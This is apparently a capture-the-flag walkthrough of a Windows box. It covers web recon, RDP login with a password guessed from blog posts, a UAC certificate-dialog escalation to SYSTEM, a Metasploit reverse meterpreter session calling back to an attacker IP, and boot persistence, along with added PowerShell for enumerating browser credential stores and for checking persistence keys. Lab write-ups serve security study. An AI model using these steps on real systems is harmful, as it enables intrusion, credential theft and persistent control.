Nmap:
- 80/tcp: default IIS 10.0 landing page
- 3389/tcp: RDP
Dirbuster (launched in the background with dirbuster &):
- Target URL: http://10.10.57.11:80/
- tick Go Faster
- File extension: asp
- Start
found:
/retro
Navigating there shows a blog whose posts are signed:
by: Wade
so Wade is a potential username.
In one of the posts he talks about Ready Player One and says he uses the name of Wade's avatar from that book as his password:
Parzival
Potential login:
wade:parzival
RDP to port 3389 and log in as that user.
Windows Defender kills WinPEAS and PowerUp as soon as they land, so enumerate manually instead:
- Recycle Bin (what the user deleted, and the original location of each item)
- Browser history / saved passwords / favorites (VERY IMPORTANT, comes up constantly)
The Recycle Bin holds a program that was deleted; restore it so it can be run.
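Added example, not from the original write-up: a PowerShell snippet for the manual enumeration above, typed in a PowerShell window over the RDP session as wade. It reads the Recycle Bin through the Shell COM object so each deleted item shows its original path, lists favorites with the URL each shortcut points to, locates the Chrome/Edge/Firefox profile databases and dumps Chromium bookmarks (plain JSON). The browser paths are the default install locations and are an assumption; History, Login Data and Cookies are SQLite files locked while the browser runs, so they are only located here, not read.

```powershell
# Added example, not part of the original write-up: manual enumeration for
# when Defender eats WinPEAS/PowerUp. Run in a PowerShell window over RDP.
# Browser profile paths below are the default install locations (assumption).

function Get-RecycleBinItems {
    # Shell folder 0xA is the Recycle Bin; GetDetailsOf column 1 is
    # "Original Location" and column 2 is "Date Deleted"
    $bin = (New-Object -ComObject Shell.Application).NameSpace(0xA)
    foreach ($item in $bin.Items()) {
        [pscustomobject]@{
            Name     = $item.Name
            Original = $bin.GetDetailsOf($item, 1)
            Deleted  = $bin.GetDetailsOf($item, 2)
            Size     = $item.Size
        }
    }
}

function Get-FavoriteUrls {
    # .url shortcuts are INI files; the URL= line is the target
    $fav = [Environment]::GetFolderPath('Favorites')
    Get-ChildItem $fav -Recurse -Filter *.url -ErrorAction SilentlyContinue | ForEach-Object {
        $m   = Select-String -Path $_.FullName -Pattern '^URL=(.*)$' | Select-Object -First 1
        $url = ''
        if ($m) { $url = $m.Matches[0].Groups[1].Value }
        [pscustomobject]@{ Name = $_.BaseName; Url = $url }
    }
}

# Chromium profile directories (Chrome and Edge share the same layout)
$chromiumProfiles = [ordered]@{
    Chrome = Join-Path $env:LOCALAPPDATA 'Google\Chrome\User Data\Default'
    Edge   = Join-Path $env:LOCALAPPDATA 'Microsoft\Edge\User Data\Default'
}

function Get-BrowserArtifacts {
    foreach ($b in $chromiumProfiles.GetEnumerator()) {
        if (-not (Test-Path $b.Value)) { continue }
        # History, Login Data and Cookies are SQLite and locked while the browser
        # runs: copy them off and open with a sqlite reader (not done here)
        foreach ($f in 'History', 'Login Data', 'Cookies', 'Bookmarks') {
            $p = Join-Path $b.Value $f
            if (Test-Path $p) {
                $fi = Get-Item $p
                [pscustomobject]@{ Browser = $b.Key; File = $f; Bytes = $fi.Length; Modified = $fi.LastWriteTime }
            }
        }
    }
    # Firefox: history and bookmarks in places.sqlite, saved logins in logins.json + key4.db
    $ff = Join-Path $env:APPDATA 'Mozilla\Firefox\Profiles'
    Get-ChildItem $ff -Recurse -Include places.sqlite, logins.json, key4.db -ErrorAction SilentlyContinue |
        ForEach-Object { [pscustomobject]@{ Browser = 'Firefox'; File = $_.Name; Bytes = $_.Length; Modified = $_.LastWriteTime } }
}

function Get-ChromiumBookmarkNodes($node) {
    # the Bookmarks file is JSON: recurse into folders, emit url nodes
    if ($node.type -eq 'url') { [pscustomobject]@{ Name = $node.name; Url = $node.url } }
    elseif ($node.children) { foreach ($c in $node.children) { Get-ChromiumBookmarkNodes $c } }
}

function Get-BrowserBookmarks {
    foreach ($b in $chromiumProfiles.GetEnumerator()) {
        $bm = Join-Path $b.Value 'Bookmarks'
        if (-not (Test-Path $bm)) { continue }
        $json = Get-Content $bm -Raw | ConvertFrom-Json
        # roots = bookmark_bar, other, synced (each a folder node)
        foreach ($root in $json.roots.PSObject.Properties) {
            Get-ChromiumBookmarkNodes $root.Value |
                ForEach-Object { [pscustomobject]@{ Browser = $b.Key; Name = $_.Name; Url = $_.Url } }
        }
    }
}

Get-RecycleBinItems  | Format-Table -AutoSize
Get-FavoriteUrls     | Format-Table -AutoSize
Get-BrowserArtifacts | Format-Table -AutoSize
Get-BrowserBookmarks | Format-Table -AutoSize
```

Nothing here is written to disk or injected into another process, which is why Defender leaves it alone where it flags WinPEAS; the cost is that the SQLite-backed history and credential stores still have to be copied off and read elsewhere.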
Exploit (UAC certificate-dialog escalation):
- Run the restored program as administrator; on the UAC prompt click: Show more details
- Click: Show information about the publisher's certificate
- Click the "Issued by" URL link in the certificate dialog
- Wait for the page to fully load in the browser window that opens
- Click: Settings > File > Save as
- In the Save As dialog's address bar type the following and press Enter:
- C:\WINDOWS\system32\cmd.exe
- Escalated privileges: the UAC prompt, and so the browser and this cmd.exe, run as NT AUTHORITY\SYSTEM; confirm with whoami
Kali:
Defender is running on the box, so instead of dropping a binary use in-memory PowerShell web delivery:
msfconsole
use exploit/multi/script/web_delivery
set lhost tun0
set payload windows/meterpreter/reverse_http
set target 2 #PSH (PowerShell)
run -j
Metasploit prints a PowerShell one-liner; run it on the target from the SYSTEM cmd.exe obtained above (start powershell from it and paste), then:
sessions -i 1
meterpreter:
getuid
- should show NT AUTHORITY\SYSTEM if the one-liner was launched from the escalated cmd.exe
run persistence -X
- -X installs the payload so it starts on system boot; it writes under HKLM, so the session needs SYSTEM/admin
- persistence is a deprecated meterpreter script; newer Metasploit warns and points to exploit/windows/local/persistence instead
Run it with options that make the payload call back to your machine if the box reboots. You need a listener for that callback: exploit/multi/handler with the same payload (windows/meterpreter/reverse_http), LHOST 10.10.60.200, LPORT 9001 and ExitOnSession set to false, backgrounded with exploit -j. With that in place you have full control of the host and persistence for further operations.
run persistence -X -r 10.10.60.200 -p 9001
-r and -p are Kali's IP and the handler port.
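Added example, not from the original write-up: a check, run on the target (over RDP or from a meterpreter shell), of what the persistence script left behind, so you can confirm it will survive a reboot and remove it when the exercise is over. It assumes the script's usual layout: a randomly named .vbs dropped in %TEMP% and a Run value pointing at it (HKLM with -X, HKCU with -U); other Metasploit versions or the exploit/windows/local/persistence module may use a different name or location. The same Run-value pattern is what a defender would hunt for, which is the reason to know it.

```powershell
# Added example, not from the original write-up: verify (and later remove) what
# `run persistence -X` left on the box. Assumes the script's usual layout: a
# random-named .vbs in %TEMP% referenced from a Run key (HKLM for -X, HKCU for -U).

$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
# metadata properties Get-ItemProperty adds to every result; not registry values
$psMeta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

function Get-RunEntries {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -in $psMeta) { continue }
            $val = [string]$p.Value
            [pscustomobject]@{
                Key        = $key
                Name       = $p.Name
                Command    = $val
                # script interpreters or anything under a Temp directory is what
                # the persistence script produces and what a hunt would flag
                Suspicious = ($val -match '\.vbs' -or $val -match '\\Temp\\' -or $val -match 'wscript|cscript|powershell')
            }
        }
    }
}

function Get-TempScripts {
    # the dropped payload: a .vbs in %TEMP% written when persistence ran
    Get-ChildItem $env:TEMP -Filter *.vbs -ErrorAction SilentlyContinue |
        Sort-Object LastWriteTime -Descending |
        Select-Object FullName, Length, LastWriteTime
}

function Remove-Persistence {
    param(
        [Parameter(Mandatory)][string]$Name,
        [string]$Key = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
    )
    # cleanup: read the Run value to find the script, then delete both
    $path = (Get-ItemProperty -Path $Key -Name $Name).$Name
    Remove-ItemProperty -Path $Key -Name $Name
    if ($path -and (Test-Path $path)) { Remove-Item $path -Force }
}

Get-RunEntries | Where-Object Suspicious | Format-Table -AutoSize
Get-TempScripts | Format-Table -AutoSize
# after the exercise: Remove-Persistence -Name '<value name shown above>'
```

Metasploit also prints the path of a cleanup resource file when the persistence script runs; `resource <that path>` from the meterpreter session does the same removal from the attacker side, but checking the Run keys on the host is how you confirm it actually happened.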